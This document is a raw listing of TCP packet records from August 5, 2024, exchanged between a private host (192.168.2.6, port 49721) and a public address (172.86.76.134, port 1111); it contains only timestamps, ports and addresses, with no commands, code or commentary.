                              Aug 5, 2024 14:40:50.747400999 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.747457981 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.747499943 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.747554064 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.747586012 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.747584105 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:50.747616053 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:50.747623920 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.747658968 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.747689962 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:50.793008089 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:50.797202110 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.797255993 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.797313929 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.797346115 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:50.797367096 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.797399044 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.797425985 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:50.797431946 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.797488928 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.797545910 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:50.797646046 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.797678947 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.797691107 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:50.797712088 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.797749043 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.797782898 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.797792912 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:50.797816992 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.797842026 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:50.797852993 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.797885895 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.797919989 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.797934055 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:50.798017025 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:50.798211098 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.798244953 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.798276901 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.798312902 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.798341990 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:50.798350096 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.798373938 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:50.798382998 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.798415899 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.798448086 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.798461914 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:50.798499107 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:50.798485041 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.798535109 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.798569918 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.798620939 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:50.798844099 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.798876047 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.798902035 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:50.798907995 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.798945904 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.798974037 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:50.798979998 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.799011946 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.799021959 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:50.799046040 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.799077034 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.799104929 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:50.799112082 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.799144983 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.799155951 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:50.799199104 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.799232006 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.799247026 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:50.799264908 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.799297094 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.799307108 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:50.799330950 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.799362898 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.799396992 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.799412966 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:50.799529076 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:50.799874067 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.799906969 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.799940109 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.799952984 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:50.799979925 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.800013065 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.800045013 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.800060034 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:50.800077915 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.800102949 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:50.800111055 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.800144911 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.800152063 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:50.800178051 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.800206900 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.800240040 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.800271034 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:50.800271034 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.800303936 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.800324917 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:50.800337076 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.800345898 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:50.800369978 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.800400972 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.800415993 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:50.800435066 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.800467968 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.800513983 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:50.800846100 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.800900936 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:50.800909042 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.800946951 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.800978899 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.801016092 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.801021099 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:50.801050901 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.801062107 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:50.801083088 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.801116943 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.801148891 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.801173925 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:50.801182985 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.801208019 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:50.801215887 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.801248074 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.801261902 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:50.801280022 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.801311970 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.801343918 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.801364899 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:50.801378012 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.801402092 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:50.801409006 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.801441908 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.801467896 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:50.801827908 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.801861048 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.801882982 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:50.801893950 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.801932096 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.801964045 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.801980972 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.802015066 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.802047014 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.802078009 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.802102089 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:50.802112103 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.802144051 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.802164078 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:50.802186966 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.802200079 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:50.802220106 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.802253008 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.802284956 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.802293062 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:50.802318096 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.802350998 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.802367926 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:50.802386045 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.802398920 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:50.802630901 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.802668095 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.802717924 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:50.836098909 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.836124897 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.836137056 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.836153984 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:50.836189032 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:50.836236954 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.836250067 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.836262941 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.836292028 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:50.836441994 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.836493015 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:50.886140108 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.886156082 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.886167049 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.886250019 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.886260986 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.886272907 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.886285067 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.886293888 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:50.886348963 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:50.886497974 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.886509895 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.886529922 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.886539936 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.886550903 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.886557102 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:50.886560917 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.886583090 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.886581898 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:50.886607885 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:50.886682987 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:50.886912107 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.886921883 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.886941910 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.886957884 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.886969090 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.886969090 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:50.886979103 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.886991024 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.887003899 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.887013912 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.887023926 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.887033939 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.887042046 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:50.887043953 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.887054920 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.887068987 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.887094975 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:50.887116909 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:50.887789965 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.887801886 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.887811899 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.887823105 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.887835026 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.887845993 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.887856007 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.887866974 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.887871981 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:50.887878895 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.887890100 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.887901068 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:50.887902975 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.887914896 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.887926102 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.887929916 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:50.887938023 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.887948036 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.887948990 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:50.887959003 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.887969971 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.887969971 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:50.888005018 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:50.888750076 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.888761997 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.888771057 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.888784885 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.888794899 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.888806105 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.888828993 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:50.888864040 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.888875008 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.888876915 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:50.888885975 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.888896942 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.888906956 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.888911009 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:50.888917923 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.888928890 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.888941050 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.888952017 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.888952971 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:50.888962984 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.888973951 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.888984919 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.888991117 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:50.889014006 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:50.889715910 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.889729023 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.889739037 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.889750957 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.889760971 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.889770985 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.889781952 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.889791965 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.889795065 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:50.889801979 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.889813900 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.889825106 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.889836073 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.889842987 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:50.889848948 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.889859915 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.889861107 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:50.889869928 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.889880896 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.889889956 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.889900923 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.889904022 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:50.889911890 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.889923096 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.889947891 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:50.889967918 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:50.890713930 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.890726089 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.890737057 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.890747070 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.890758038 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.890768051 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.890779018 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.890789032 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.890789986 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:50.890799999 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.890810013 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:50.890810966 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.890824080 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.890835047 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.890842915 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:50.890846968 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.890857935 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.890862942 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.890865088 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:50.890872955 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.890883923 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.890888929 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:50.890923023 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:50.890947104 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:50.891499043 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.891513109 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.891577005 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:50.934221029 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.934276104 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.934287071 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.934305906 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.934315920 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.934328079 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.934340000 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.934416056 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:50.975109100 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.975127935 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.975147009 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.975157976 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.975168943 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.975182056 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.975298882 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.975311041 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.975351095 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.975349903 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:50.975361109 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.975372076 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.975383043 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.975403070 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:50.975433111 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:50.975790977 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.975801945 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.975811005 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.975821972 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.975832939 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.975841045 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:50.975843906 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.975855112 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.975867033 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.975872993 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:50.975877047 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.975888014 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.975898981 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.975909948 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.975909948 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:50.975924015 CEST111149721172.86.76.134192.168.2.6
